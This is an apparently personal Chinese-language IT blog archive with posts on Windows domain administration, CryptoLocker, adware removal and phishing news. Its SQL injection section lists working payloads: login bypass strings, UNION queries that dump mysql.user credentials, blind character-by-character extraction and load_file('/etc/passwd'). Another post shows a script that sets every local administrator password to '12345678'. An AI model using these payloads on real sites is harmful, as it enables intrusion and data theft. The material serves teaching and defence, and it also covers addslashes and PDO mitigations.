Pages

Subscribe:

Ads 468x60px

Labels

顯示具有 資訊安全 標籤的文章。 顯示所有文章
顯示具有 資訊安全 標籤的文章。 顯示所有文章

2015年12月17日 星期四

CryptoLocker-嘞索病毒

這是一個新興的病毒,對於資料的殺傷力驚人,要特別小心喔

維基百科對此的介紹

CryptoLocker是一種於2013年下半年出現的特洛伊木馬,以勒索軟體的形式出現的惡意軟體,以Microsoft Windows作業系統為主要攻擊目標,近期也向Linux作業系統攻擊。CryptoLocker會偽裝成一個合法的電子郵件附件或.exe格式檔案;如果被活化,該惡意軟體就會使用RSA公鑰加密AES私人金鑰的形式,加密本地與內部網路的特定類型檔案;而私人金鑰則把持在惡意軟體所控制的伺服器上。該蠕蟲會顯示一則訊息,表示如果在規定的期限進行付款(經由比特幣或其他儲值管道),就能夠解密這些檔案,否則私人金鑰將會被銷毀,再也不能打開這些檔案。如果該期限不符合,該惡意軟體還會提供一個由惡意軟體控制的線上服務提供解密,但要付出高額的比特幣。
即使CryptoLocker本身很容易清除,但是這些已經被加密的檔案,對於研究者而言是無法被解開的。部分研究者認為如果不付款給勒索者,就沒有其他方法能夠解密這些檔案;另外的研究者則說付款給勒索者是唯一能在不備份的情形下,讓檔案解密的方法。

2015年9月15日 星期二

authenticated users

資料來源

Authenticated Users:Windows系统中所有使用用户名、密码登录并通过身份验证的账户,不包括来宾账户Guest,即使来宾帐户有密码。 与Everyone的区别在于Everyone包括所有账户,如内置的来宾账户和LOCAL_SERVICE。[1] 
中文名
经过身份验证的用户
外文名
authenticated users
性    质
科学
类    别
计算机

基本介绍编辑

Authenticated Users(经过身份验证的用户)用户组具有向 Active Directory 域中添加10个计算机账户的能力。这些新计算机账户在计算机容器中创建。
用该组代替everyone组可以防止匿名访问。

解决办法编辑

拒绝Authenticated Users组造成Administrator无法访问AD对象的解决办法:
为了限制用户访问Address Lists修改了Exchange Server Manager里面Address Lists的安全设置,但是,错误地拒绝了Authenticated Users的访问权限。
因为Administrator属于Authenticated Users组,所以无法再从管理控制台用Administrator来访问。不要说Administrator,任何验证用户都没有办法访问了,添加新的Admin也不行。
Guest用户不属于Authenticated Users,所以可以绕过去……但是Guest用户不具有任何修改权限。
Schema Admin Users可以修改AD架构,所以我们临时把Guest加入到改组,建议这样做的时候限制网络的访问,在单机上操作,规避风险。
使用Runas方式打开ADSIEdit工具,
CN=All Address Lists,CN=Microsoft Exchange,CN=Services,CN=Configuration,DN=,DN=,DN=
DN代表您的域名,根据实际情况调整。
修改安全设置,恢复Administrtor的管理权。
最后,将Guest的权限收回。

操作步骤编辑

1、在控制面板帐户中开启来宾帐户
2、我的电脑上点右键,点管理>本地用户和组>用户
3、在Guest上点右键,选属性
[localimg=180,144]2[/localimg]
4、在属性窗口中点隶属于选项卡,点添加,在弹出窗口中点高级,点立即查找
[localimg=180,111]3[/localimg]
5、双击搜索结果中的“Administrator”,弹出窗口点确定,隶属于窗口继续点确定
[localimg=141,150]4[/localimg]
6、用Guest帐户登录,选择要修改的文件夹、磁盘,将Authenticated Users修改为允许即可。
7、将Guest帐户的权限收回。

郵件伺服器選擇要點

資料來源

1.共用群組
2.共用通訊錄
3.共用行事曆(Optional)
4.不在辦公室通知
5.授權讀取/代發/編輯 mail / 行事曆
6.Web Mail介面
7.POP3/IMAP4
8.帳號鎖定/離職群組鎖定
9.mail box quota
10.管理員檢視(允許管理員監看或處理使用者郵箱)
11.轉發/複本 for 主管 or 離職人員
12.郵件即時備份機制(或是郵件稽核機制)(Optional)
13.會議邀請整合會議室/資源
14.待辦事項
15.Spam Filter
16.防毒
17.Outlook 相容(Optional)
18.郵件誤發取回/索取回條(Optional)
19.郵件加密/禁止複製/禁止轉發
20.免責聲明
21.帳號收發限制
22.多帳號信箱
23.多網域

2015年9月10日 星期四

以群組原則設定網域使用者擁有 Local Administrator 權限及修改密碼

資料來源

首先,因為網域使用者帳號預設是放在DC的「網域名稱→User」底下,而這個「User」並無法直接設定群組原則(Group Policy)。此外企業內的電腦通常會因各種因素而有不同的管理需求,所以應該要建立不同的OU來做管理。簡單的來說,我們可以先在「群組原則管理」(gpmc.msc)中的「群組原則物件」建立一些符合需求的原則,然後建立各部門的OU,最後再依實際需求將「群組原則物件」複製到那個OU去(或是直接在OU裡面新增原則),比較能符合現實層面的管理。
一、賦予權限: 讓網域內的特定使用者擁有本機 Administrator 帳戶權限:
那如果要讓某位網域使用者 (假定為 CYCU\TEST1) 具備某一個OU下所有成員電腦中的系統管理員權限,若直接將這個 CYCU\TEST1 加入 Domain Admins 群組雖是最快的方式。但如此一來,這個 CYCU\TEST1 就具備了管理網域的權限,這樣權限絕對是過大了。因此建議的作法是在OU底下使用群組原則中的「受限群組」來將網域使用者加到 Administrators 群組織中,以後客戶端就可以使用 Administrator 這個管理員帳戶登入自己的電腦。操作的方式請參照下圖:
二、收回權限: 每次開機時修改網域內使用者的本機 Administrator 帳戶密碼:
雖然上面介紹了如何給 Local Administrator 權限,但筆者還是不太適合,因為那樣真的就有點失去 AD 的意義了,每個人都不受控制… 其實不給 Local Administrator 最主要的用意是在於防範使用者被賦予該部電腦的最高管理權限,可能導致中毒時去攻擊其他網域內的電腦,所以為了安全性,不開放才是比較好的做法啊…
那有什麼好方法可以管理 Local Administrator 帳戶的權限呢? 如果公司政策支持的話,網管人員最簡單的做法就是寫一個 vbs,如此就可以修改網域內每部電腦的 Local Administrator 密碼,然後統一保管,並要求使用者必須以網域帳號登入。以下的範例是修改 Local Administrator 的密碼為 12345678(如果 AD 裡面設定密碼必須複雜化,則這個 vbs 可能不會修改客戶端 Local Administrator 帳戶密碼):
strComputer = "."

Set objUser = GetObject("WinNT://" & strComputer & "/Administrator,user")
objUser.SetPassword "12345678"
objUser.SetInfo
1.在OU底下使用群組原則後再依下圖操作:
2.點選「顯示檔案」:
3.將第一步修改密碼的 vbs 放進去後即可讓使用者在登出後自動執行:
4.上述兩種原則設定完成後,如果想立即讓網域底下的電腦生效,請在 DC 上輸入「gpupdate /force」:

2015年9月4日 星期五

設定AD帳戶網路磁碟空間

資料來源
以NAS (網路附接儲存設備) 為例,做如下規劃:1. 使用者擁有10GB的個人網路硬碟空間 2. 建立「資源分享區」存放公用軟體 (使用者僅有下載無上傳權限),NAS需支援Active Directory或LDAP目錄服務,即使不執行上述服務只要AD使用者帳密與NAS使用者帳密一致即可。

步驟一:在AD上建立個人網路硬碟空間連結至NAS

1. 在AD Server上開啟「Active Directory 使用和與電腦」à 使用者 (按滑鼠右鍵選「內容」) à 設定檔 à 主資料夾 à 連線Z磁碟機到NAS帳戶資料夾

2. 選擇「套用」 à 出現「Active Directory 網域服務」視窗,說明主資料夾的設定成功 à 連按2次「確定」完成設定。

3. 使用者登入後,在「我的電腦」內可發現多出 Z 磁碟機並以帳戶名稱命名的網路硬碟

步驟二:在AD上建立「資源分享區」連結至NAS

1. 建立使用者登入指令(Script)檔,檔名 TPCSoft.bat,內容如下:

   @echo off
   net use X: \\nas\資源分享區

2. 開始 à 系統管理工具 à 群組原則管理 à 樹系 à 網域 à 網域名稱 (例: Yingge.local) à 群組原則物件 à Default Domain Policy (滑鼠右鍵) à 編輯(Eà 使用者設定 à 原則 à Windows設定 à指令碼 - (登入/登出) à 登入 à  顯示檔案(S)... à將Script登入檔放入並關閉視窗 à 新增(D)... à瀏覽(B)... à選該Script檔 à開啟舊檔(Oà 確定 à 確定

3. 執行 gpupdate 

4. 使用者登入後,在「我的電腦」內可發現 X 磁碟機「資源分享區」的網路硬碟

5. 上述步驟會讓每位登入網域使用者均套用登入指令檔去使用「資源分享區」的公用資料夾 (這是因為我們用群組原則的關係),若只給部分使用者套用則可採另一種方式,假設欲連至另一台nas的行政資料夾,首先建立使用者登入指令(Script)檔,檔名 教務處.bat,內容如下:

   net use y: \\nasold\教務處

6. 於AD主機上,開始 à 執行 à 輸入 \\AD名稱\netlogon,此時會跳出NETLOGON的資料夾

7. 將Script登入檔 (教務處.bat) 放入資料夾內

8. 在AD Server上開啟「Active Directory 使用和與電腦」 à 使用者 (按滑鼠右鍵選「內容」) à 設定檔 à 使用者設定檔 à 登入指令檔(S): à 輸入 教務處.bat à 確定

9. 使用者登入後,在「我的電腦」內可發現Y磁碟機「教務處」的網路硬碟

2015年4月17日 星期五

如何完整移除 Snap.do (及類似網站) ,解決首頁綁架、工具列、搜尋綁架問題?(IE, Google Chrome, Firefox)

最近很多人應該對「Snap.do」這東西非常感冒,不但會強加很難用的工具列,還會綁架 IE, Firefox 與 Google Chrome 等瀏覽器的首頁及搜尋引擎功能。重點是軟體都移除了,可是瀏覽器首頁卻被咬得死死得,每次重設完之後還會自動跑回來。
Snap.do 的工具列與瀏覽器首頁綁架等問題到底是怎麼來的呢?目前大部份都是包含在其他看似沒有異狀的免費軟體中,當我們安裝免費軟體時,他會不經意出現一個額外的安裝視窗,問我們要不要繼續安裝,如果你還沒來得及看就按下「Next」或「下一步」,那你的電腦就中標了!
其實 Snap.do 的問題不大,但還是得依照步驟來處理才有辦法完整移除乾淨。首先就是先到控制台移除跟 Snap.do 有關的全部軟體,只要軟體名稱中有 Snap.do 就把它移除掉。移除軟體後,到登錄檔編輯程式中搜尋「Snap.do」並將找到的項目通通刪除(至少3個)!接著讓電腦重開機,重開機完後分別到 IE, Firefox 與 Google Chrom 的外掛管理頁面,將 Snap.do 的擴充套件、搜尋外掛或各種相關程式移除,然後重開瀏覽器並到設定視窗中重設你的瀏覽器首頁或啟動頁面。
整個步驟中最關鍵的就是執行的順序,一定要先移除軟體、刪除登錄檔中的項目,接著再到瀏覽器移除外掛與擴充功能,最後才能重設瀏覽器首頁與搜尋功能。日後如果再遇到與 Snap.do 類似的垃圾軟體,不管咬得多緊,依照以上步驟大部份都可以成功移除、讓電腦恢復原貌。

完整移除 Snap.do 的步驟:
  • 1. 先到控制台移除 Snap.do 軟體(也許需要重開機)。
  • 2. 執行 regedit 指令,到登錄檔編輯程式中搜尋、刪除 Snap.do 相關內容。
  • 3. 讓電腦重開機。
  • 4. 開啟 IE 或 Firefox, Google Chrome 瀏覽器,移除相關擴充套件、外掛或搜尋外掛
  • 5. 重新啟動瀏覽器後,到設定頁面重設瀏覽器首頁與起始頁。
  • 6. 完成。

一、到控制台移除軟體

第1步  從開始選單開啟「控制台」視窗,點一下「解除安裝程式」,準備移除所有與 Snap.do 有關的軟體。
注意!若無法用 Windows 內建的移除工具移除軟體,請改用:Revo Uninstaller

remove-Snap.do-001

第2步  開啟「程式和功能」視窗後,請仔細尋找任何跟「Snap.do」有關的軟體,找到後先移除「Snap.Do Engine」再移除「Snap.Do」。
remove-Snap.do-002


二、搜尋登錄檔,刪除 Snap.do 相關資訊

第1步  移除 Snap.Do 軟體後,按「視窗」+「R」快速鍵開啟「執行」視窗,輸入「regedit」後按「Enter」鍵打開登錄檔編輯程式。
remove-Snap.do-003

第2步  接著請按選單中的「編輯」→「搜尋」,在方框中輸入「Snap.Do」再按「找下一個」。
remove-Snap.do-004

第3步  找到跟 Snap.Do 相關的項目後,請將整個機碼刪除(刪除看起來像資料夾圖示的那個)。
重複執行第2 ~ 3步驟,一直到找不到跟 Snap.Do 相關的項目為止(至少 3~5 個)。
remove-Snap.do-005


三、重設 IE 瀏覽器首頁、搜尋功能與外掛

第1步  移除完軟體、刪除了登錄檔中跟 Snap.Do 有關的機碼之後,請讓電腦重開機然後開啟 IE 瀏覽器,點一下右上角的齒輪圖示,並在選單中點「網際網路選項」。
remove-Snap.do-IE-01

第2步  在「一般」分頁中重新輸入你希望每次開啟 IE 時要啟動的網頁,設定完後按「確定」。
remove-Snap.do-IE-02

詳見

2015年4月14日 星期二

Ip如何限制讀取ip的寫法


$ip=ip2long(getenv("REMOTE_ADDR"));
if ($ip>=ip2long("195.74.96.0") AND $ip<=ip2long("195.74.127.255"))
{
$ok = 1;
}else{
header("location:blocked.php");
}
?>


這個效果還不錯

2015年4月10日 星期五

SQL injection 基本介紹

SQL injection(又稱SQL注入式攻擊 或是 SQL資料隱碼攻擊),指的是利用SQL指令的輸入字串中夾帶其他的SQL指令,一般來說都是從正當的查詢指令中夾帶惡意指令
例如:非法取得資料、惡意破壞資料...等。因此在程式設計時,也必須把這個基本的安全性給考慮進去。
下面就介紹一個基本的SQL injection範例(以帳號登入為例)
首先,我們先建立一個HTML表單來傳送資料
<form action="testsql.php" method="post">
帳號:<input type="text" name="account"><br>
密碼:<input type="password" name="password"><br>
<input type="submit" value="送出">
</form>
同時也建立一個資料庫來做測試
sql 

接著就可以撰寫接收端程式
 //接收帳號、密碼
 $account = $_REQUEST['account'];
 $pass = $_REQUEST['password'];
 //密碼使用md5加密
 $password = md5($pass);
 //查詢有無符合帳號資料
  $sql = "SELECT * FROM `test_sql` WHERE `account` LIKE '".$account."' AND `password` LIKE '".$password."'";
  $res = mysql_query($sql);
  $result = mysql_fetch_array($res);
  if(empty($result)){
     //若無符合顯示查無帳號
     echo "查無此帳號<br>";
     echo $sql;
     echo "<br>輸入帳號".$account;
     echo "<br>輸入密碼".$pass;
}else{
//若符合顯示帳號、密碼資訊
     echo "帳號:".$account;
     echo "<br>密碼:".$pass;
     echo "<br>".$sql;
}
以此例說明:
當帳號輸入"' OR ''=''#" 或是 "' OR ''=''-- "(雙引號內字串)就可以進行非法登入(如下圖)
input1或是   input2  

原理:在SQL指令中 "#"和"-- "代表注釋
因此原本輸入的查詢是
"SELECT * FROM `test_sql` WHERE `account` LIKE '".$account."' AND `password` LIKE '".$password."'";
會變成account欄位等於空 或是 ''='' ,後面的密碼則被注釋掉了
"SELECT * FROM `test_sql` WHERE `account` LIKE '".$account."'' OR ''=''";
而後者條件成立,SQL指令就會開始執行(如下圖,此例取出第一筆資料)
output1 

解決這類型的非法登入的方式有幾種:
1. 使用正則表達式過濾字串;這是最搞剛卻也最安全的作法
2. 使用addslashes();這個函數會在所有的單引號前加上反斜線
下面就用addslashes()來簡單說明
//在接收的參數錢加上addslashes()
$account = addslashes($_REQUEST['account']);
$pass = addslashes($_REQUEST['password']);
再測試非法登入
output2 

輸入的資料經過轉換後,單引號的作用就失效了
這樣就能有效防範非法登入,而且對於一般人使用正當登入方法不受影響

SQL Injection 常見的駭客攻擊方式

Sql Injection 應該可以說是目前網路上,駭客最常用的攻擊方式,因為攻擊方式簡單,又不需要使用任何軟體,或是自行撰寫程式。講到 SQL,就要提到資料庫,大多數的網站都會安裝資料庫伺服器(Database),其實 Database 並不是什麼可怕的東西,Database 的功能就是將資料依序儲存下來,然後以最快的速度,找出你想要的資料,而在尋找資料之前,你必須輸入 Database 指令,你輸入的這串指令,我們就稱為 SQL 語法。
Sql Injection 就是指 SQL 語法上的漏洞,藉由特殊字元,改變語法上的邏輯,駭客就能取得資料庫的所有內容,當然也包含了會員的帳號,密碼,下面就舉一個SQL登入漏洞:
一個有會員登入功能的網站,都會需要輸入帳號與密碼來進行驗證
而後端程式,如 PHP 就必需支援相關的登入檢查,判定 User 輸入的帳號、密碼是否正確,來確定登入是否成功 ,PHP 執行的 SQL 語法如下,這是一個簡單的 SQL 語法,主要功能是從 members 這個資料表中,取出符合 User 所輸入帳號與密碼的會員資料。
select * from members where account='$name' and password='$password'
但若是駭客輸入有特殊字元的帳號:「 ' or 1=1 /* 」,密碼:「任意值」
這時SQL語法就會變成:
select * from members where account='' or 1=1 /*' and password=''
因為「/*」在 MySQL 語法中代表註解的意思,所以「/*」後面的字串通通沒有執行,而這句判斷式「1=1」永遠成立,駭客就能登入此網站成功。

SQL 語法的註解

SQL 註解的語法有以下三種,不同的 SQL 版本,會吃不同的語法。
  • /*」 MySQL
  • --」 MsSQL
  • #」 MySQL , # 對於 browser 來說是有意義的,那是錨點的意思,所有必須先透過 Url Encode 後的代碼 「%23」 來代替。

防護方式

Sql Injection攻擊很簡單,不過防護也不難,只要過瀘字串「'」,即可,當然如果你的SQL語法寫得很糟,保險的做法是過瀘「' " 」等字串,並檢查變數型態「數字、字元、字串」,另外會員的密碼最好是經過加密,如 md5 或 Double md5 演算法加密,這樣就能避免資料外洩時,密碼也同時外洩,md5 目前也已經有破解方式了,使用 mcrypt 會是更好的加密方式。
PHP 過瀘 SQL Injection 的語法:$name=eregi_replace("[\']+" , '' ,$name); Sql Injection的攻擊方式會因不同的資料庫而有不同的語法, 如 MsSQL的註解是用 「--」MySQL的另一個註解是用 「#

SQL Injection 攻擊

取得 Table name

如果網站連接 database 使用的帳號,有權限讀取 INFORMATION_SCHEMA database,這樣就能直接搜尋任何一個 table 名稱,如
  • [Oracle]: or EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%xxx%') AND ''='
  • [MySQL]: or EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA like '%xxxx%') AND ''='
  • union select%20host,user,password fROM mysql.user limit 1,1#
  • union select engine, table_rows, table_name from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA not in ('information_schema') limit 1,1#
  • union select host,db,user from mysql.db limit 1,1 #
取得所有資料庫名稱
  • sqlInjection.php?id=1' union select distinct table_schema from information_schema.tables;
  • sqlInjection.php?id=1' union select group_concat(table_schema) from information_schema.tables;
取得所有資料表名稱
  • sqlInjection.php?id=1' union select group_concat(table_name) from information_schema.tables--
一般來說,information_schema 這個資料庫是沒有權限讀取的,尤其是市面上常見的虛擬主機,大部分的虛擬主機只能使用伺服器給的控制台來新增資料庫,沒辦法透過程式讀取所有的資料庫,這時駭客們會開始用猜的方式,來取得資料表的名稱,例如會員資料常會使用的 table 名稱為 users , members 等等。
猜測 table name 的 SQL Injection 如下,使用 or exists(select 1 from members);
  • sqlInjection.php?id=1' or exists(select 1 from members)/*
  • sqlInjection.php?id=1' or exists(select 1 from admin)%23
  • sqlInjection.php?id=1' or exists(select 1 from products)--

暴力猜測 Table Name

資料表的名稱不一定都是英文單字,有些工程師會使用怪怪的命名,這時駭客還是可以使用暴力破解的方式,將 Table Name 拼出來。
SQL 有個 function : substring ,這個功能可以對字串做切割,駭客可以先將「字串」切割成一個字元。
接著使用 ord 將字元轉成 Ascii Code ,然後去比對他的 Ascii Code 是否 = 32~ 127 , a = 97b = 98
看一個範例,我要比對 information_schema.tables 第一筆資料的第一個 table_name ,其中的第一個字元。
  • id=1' and 97=(select ord(substring(table_name, 1,1) from information_schema.tables limit 0,1)--
  • id=1' and 98=(select ord(substring(table_name, 1,1) from information_schema.tables limit 0,1)--
  • id=1' and 99=(select ord(substring(table_name, 1,1) from information_schema.tables limit 0,1)--


再看一個範例,我要比對 information_schema.tables 第一筆資料的第一個 table_name ,其中的第二個字元。
  • id=1' and 97=(select ord(substring(table_name, 2,1) from information_schema.tables limit 0,1)--
  • id=1' and 98=(select ord(substring(table_name, 2,1) from information_schema.tables limit 0,1)--
  • id=1' and 99=(select ord(substring(table_name, 2,1) from information_schema.tables limit 0,1)--

取得 MySQL 資料庫相關訊息

取得連線帳號 user()
  • sqlInjection.php?id=1' select 1,2,user()/*
取得 Mysql 版本 version()
  • sqlInjection.php?id=1' select 1,2,version()/*

讀取系統檔案內容

透過 mysql 的 method 「load_file」,駭客就能輕易取得網站的檔案內容。
  • union select 1,2,load_file('/etc/passwd')

使用 PDO 防止 SQL Injection

http://us3.php.net/manual/en/book.pdo.php
PDO 是一個可以 query 資料庫的程式,我們能夠透過 PDO 連到 Mysql server,重要的是 PDO 有提供 SQL Injection 的防護機制,使用 bindValue 的方式,PDO 會自動檢查數據格式,並轉換特殊字元,再將 User Input 填入 SQL 語法中。
PDO 使用方式
  1. $db = new PDO ("mysql:dbname=test;host=localhost;port=3306", '', 'username', 'password', array( PDO::MYSQL_ATTR_INIT_COMMAND => 'SET NAMES \'UTF8\'');
  2.  
  3. $sth = $db->prepare('select * from table where id =:id and title= :title ');
  4.  
  5. $sth->bindValue(':id', $_GET['id'], PDO::PARAM_INT);
  6.  
  7. $sth->bindValue(':title', $_GET['title'], PDO::PARAM_STR);
  8.  
  9. $sth->execute();
  10. $sth->fetch(PDO::FETCH_ASSOC);
  • PDO::PARAM_INT 數字
  • PDO::PARAM_STR 字串

相關教學下載

2015年3月21日 星期六

銀行公務全面禁用臉書 金融3.0路難行?

工商時報【記者陳碧芬╱台北報導】
金管會推動金融3.0,鼓勵銀行未來要設置專人負責社群網站及網路客戶的回應,金管會主委曾銘宗也有自己的臉書了解「婉君」意見,但有銀行員反應國內銀行網路全面禁用臉書,包括智庫台灣金融研訓院上班時間也不能上臉書!彰化銀行電子營運處長曾芳明表示,這是基於資訊安全考量,國泰金控資深副總鄧崇儀也指出,臉書等社群資訊無法作為行銷參考,因為沒有實名連結,難以分析客戶真實行為。
據坊間最新調查,42.1%新鮮人已在臉書加入或追蹤自己嚮往的企業,呼籲企業若有意預先抓住網路世代人才,必須重視口碑和網路形象。
20日所舉行的金融研訓院舉行巨量資料分析對金控及銀行業務相關研討會上,與會銀行人員抱怨,銀行不准用臉書,卻要資管人員到網路扒出個人客戶的消費行為,根本不可能;而且年輕行員多認為在臉書上,才會聽到真話,實際業務時,沒有行員肯講實話。
曾芳明表示,彰銀內部確實禁用臉書,但有彰銀內部社群,可供行員可溝通交流。據了解,這並不是個別案例,老行庫內部網絡很早就不准連上臉書,外商銀行台灣子行的花旗,匯豐等,也都是同樣情況。曾芳明指出,彰銀是站在資訊安全角度,內部網絡一旦連上臉書,恐無法防止駭客入侵。他也透露,去年318學運期間,彰銀官網因登了一句話「服貿助功,彰銀快攻」,而被駭客盯上,所幸他的部門反映快速,駭客也友善回應,沒有擴大問題。
金融研訓院長鄭貞茂表示,研訓院是由授課老師自己設立粉絲團,由個別老師自行維護,研訓院的員工不能用院內網路在上班時間上臉書。
目前銀行引用大數據分析客戶,企金客戶可以在網路上扒文找到,個人客戶就沒辦法,臉書成了被期待的一個大型資料庫。永豐銀行消費金融處協理朱致斌指出,其實臉書裡的用戶資料若要使用分析,是要經過臉書公司授權,不是銀行建個臉書官網就能把資料撈回來。
鄧崇儀表示,對於個別客戶消費行為的資料,國泰金控會找顧問公司幫忙,不會自行上臉書搜集,社群及PTT等資料只是單向,且沒有實名連結,等於是無用的資訊。

2014年8月24日 星期日

葉樹姍LINE被盜 波攻擊「轟詐」上千人

3名友人上當 各損失2萬
〔自由時報記者蘇孟娟/台中報導〕「在嗎?能幫我個忙嗎?」台中市文化局長葉樹姍前天傳出LINE帳號被盜,通訊錄上包括台中市長胡志強等政界人士、親朋好友約千人,都收到她代買遊戲卡的求助訊息,至少有3名友人受騙,各損失2萬元。
葉樹姍昨說,她希望彌補友人損失,對方均稱是自己不夠謹慎婉拒,要她別放心上,讓她難過又自責;此外,她雖在第一時間報警,因無止付管道,緊急呼籲大家勿再受騙,也盼LINE公司保障用戶權益。
葉樹姍說,前晚在台中圓滿戶外劇場參加「台中心動影像音樂會」,約7點起,突然大量湧入友人來電關切,急問她怎麼了,眾人均因收到她用LINE留言「在嗎?能幫我個忙嗎?」打來關切,而她根本未曾發訊息,經友人傳來「她留言的照片」,才驚覺可能是帳號被盜,趕緊報警。
葉樹姍說,手機通訊錄有千餘人,幾乎都收到相同LINE訊息,連胡志強也收到。初步了解有3名好友受害,每個人都被要求買4張5千元儲值卡,各損失2萬元。
點不明貼圖連結 著了道
葉樹姍回想,日前接獲一個貼圖,結果該貼圖連結到網站要她登錄,還留電子郵件信箱,她根據步驟操作,貼圖未下載成功,隔天又收到LINE通知帳號疑被入侵,要求她改密碼,懷疑可能跟被盜帳號有關。
「詫異無法立即阻止」
葉樹姍說,她第一時間在圓滿劇場附近派出所報案,並向電信警察報案,才知LINE帳號被盜詐騙案已有數百件,令她大感詫異,但LINE公司處理程序卻要7到10天,根本無從阻止不法。
葉樹姍說,前晚的詐騙訊息,集中在7到10點發出,期間她接了近200通友人關切電話,但深夜11點半起,又有另一波詐騙訊息發出,又引起友人來電關切,顯示就算報案,也無從及時防止惡行,希望包括LINE及遊戲卡公司,均應負起企業社會責任,研訂防堵或是中止保護機制,以免用戶權益受損。

2014年8月13日 星期三

有人從不明位置存取我的facebook,要驗證帳號解除鎖定卻被網路釣魚!

Facebook Security 出現網路釣魚假網站
Facebook Security 是 Facebook 的一個官方網頁,專門用來提供與使用者相關的安全資訊,但現在卻出現專門利用這個網頁名義的網路釣魚攻擊。

2014年6月30日 星期一

有毒簡訊「借人頭」 騙完還自我銷毀

自由時報記者姚岳宏、劉慶侯/台北報導〕林姓男子的手機簡訊顯示「看世足賽享受優惠」,並貼有網址,他好奇點選連結,月底驚覺手機帳單多了1000元,報案才知中計。
一旦中毒 自動轟詐通訊錄朋友
刑事局165專線說,這是詐騙集團以LINE、手機簡訊設下的陷阱,一旦點選「惡意程式」,手機就啟動小額付費功能,發送害人簡訊給其他門號,程式還會自動刪除收件匣簡訊,讓持有人無法察覺異狀,防不勝防,直到帳單金額暴增才知受騙。
詐騙集團以手機濫發惡意連結,近來猖獗,刑事局165專線以易付卡門號實測,發現手機點選惡意連結後,一星期內就有民眾陸續回撥反映,指他們收到此門號傳送的快遞簽收通知單,想確認是否為宅急便公司。
自動刪備份 手機持有人不自覺
警方調閱通聯,發現此門號已被惡意程式綁架,且被用來進行手機小額付費,並發送附上惡意連結的簡訊給其他門號,短短5分鐘就發送120封訊息,直到被害人用完300元預付卡額度才停止。
警方驚訝的是,惡意程式甚至會自動刪除收件匣簡訊,讓寄件備份裡查不到相關資料,手機持有人根本無從察覺,而被害人直到收到小額付費帳單,才知挨詐;惡意程式也會阻斷部分通話,讓中毒手機無法撥打165查證。
警方建議,民眾若不需使用手機小額付費,可打電信公司服務電話,要求關閉這項功能,警方呼籲,收到附有連結的LINE、簡訊,應先查證,切勿馬上點選,以免誤載惡意程式;手機的設定功能中,有「安全性-允許未知來源程式」項目中,可取消勾選,就可避免下載到惡意應用程式。
北市上半年詐騙案 暴增74倍
北市刑警大隊經濟組統計,今年上半年,北市網路手機簡訊詐騙案發生524件、財產損失275萬9423元,與去年同期比較,增加了517件,幾乎暴增了74倍,損失金額也由13萬4000元,增加了262萬5423元,顯示歹徒以LINE、手機簡訊詐騙手法不斷翻新,而民眾依賴LINE、手機簡訊情況日深,卻輕忽手機訊息隱藏的陷阱。

手機點詐騙網址 被駭到無法報案

中國時報【胡欣男╱台北報導】
手機小額詐騙猖獗,刑事局近日實測點擊詐騙簡訊網址,發現受害情形除手機遭駭濫發簡訊、小額付款外,更意外發現手機竟無法撥打165反詐騙專線,連110報案電話也受阻;研判歹徒此舉讓受騙民眾無法立即求援,因滋事體大,警方已協請電信商查明原因。
刑事局預防科日前以預付卡門號實測,發現手機點惡意連結中毒後,1星期後開始有民眾回撥,詢問該門號是否為黑貓宅急便公司,因有收到該門號傳送的快遞簽收通知單。警方調閱通聯紀錄,分析門號被惡意程式「綁架」後的幾種情形。
首先是已知的利用中毒門號進行小額付費,收發認證簡訊,歹徒還將收件夾簡訊刪除,令手機持有人無法察覺。中毒門號還會濫發簡訊繼續讓其他人受騙,警方查出,短短5分鐘發送120封訊息,將300元預付額度用完才停止,且寄出簡訊自動刪除備份,民眾無法查知。
令警方訝異的是,中毒手機還被阻斷部分通話,員警嘗試撥打165,竟無法撥通,直接斷線;110也有一樣狀況,但撥其他門號、市話則不受限。專責預防詐騙的員警表示,此狀況前所未見,嚴重影響被害人向165查證、即時報案的權益,顯見駭客技術高超,已請電信商協助調查。
警方指出,最保險方式是絕不點選不明簡訊的連結網址。

大陸黑基網

大陸的黑基網
http://www.hackbase.com/

介紹許多駭客攻防的文件

是學習資訊安全必要參考的網站

2014年5月12日 星期一

訂定管理辦法、善用IT工具 過濾惡意網頁非難事

2007/06/21-張維君  

部署網頁過濾解決方案杜絕網路上由外而內的惡意程式威脅,是企業近來頗熱門的資安市場。但是通常企業主會願意掏錢買資安產品,多半是曾深受其害,甚至影響到企業運作,才開始尋找解決方案,但也有些企業認為不一定得依靠產品來解決此問題。藉由以下2例,可瞭解企業面臨此類問題的不同處理方式。
不同企業所擁有的IT資源不同,面臨的威脅來源也不同,以下A、B 兩家公司正說明了企業如何依照本身需求採取管理措施或解決方案。
EIM取代人工蒐集惡意網站 既有效率又有管理附加價值
A公司是大型金融服務業,向來對於資訊安全不敢怠慢,尤其之前也曾發生內部中毒事件,後來一查才發現是使用者連結到大陸網站,而被下載蠕蟲等惡意程式到用戶端電腦上來,因此事件過後網路管理組特別聘請了專人M先生負責Web安全,而M先生的主要工作就是蒐集網路上惡意網站的網址,並將它一一設定到防火牆上。於是M先生盡責地在各個資訊安全相關網站或討論區,蒐集惡意網站的網址資料,如台灣電腦網路危機處理暨協調中心(TWCERT/CC)網站上的資源,就是他經常瀏覽、取經的網站。
   
提供網頁過濾功能產品與端點防護工具列表
但沒想到這樣努力的蒐集還是有中毒事件傳出,雖然病毒每天都有新的變種,要百分百防堵幾乎不可能,因此主管並未多加責難。但是對M先生而言,整日在網路上蒐集惡意網站資料,工作既單調乏味又沒有成就感,辛苦蒐集了幾千個,但只要遺漏掉1個,還是會讓病毒有機會鑽到內部電腦上來,因此M先生終於對主管提出了辭呈…。
而A公司的網管部門主管,在驚訝之餘也明白用人工方式蒐集惡意網站是不切實際的,因此決定採用員工上網行為管理(EIM)解決方案,搭配有惡意程式過濾掃瞄功能的安全模組,藉由廠商的資安團隊所蒐集到的網址資料更為完整、迅速,同時EIM產品所提供的管理報表,能統計出每位員工的上網狀況,哪些人老是連上有問題的惡意網站都會統計出來,也可作為績效考核的標準之一,這也是過去用人工蒐集網站所無法提供的附加價值。
分析需求輕重緩急 將資源放在風險最高的地方
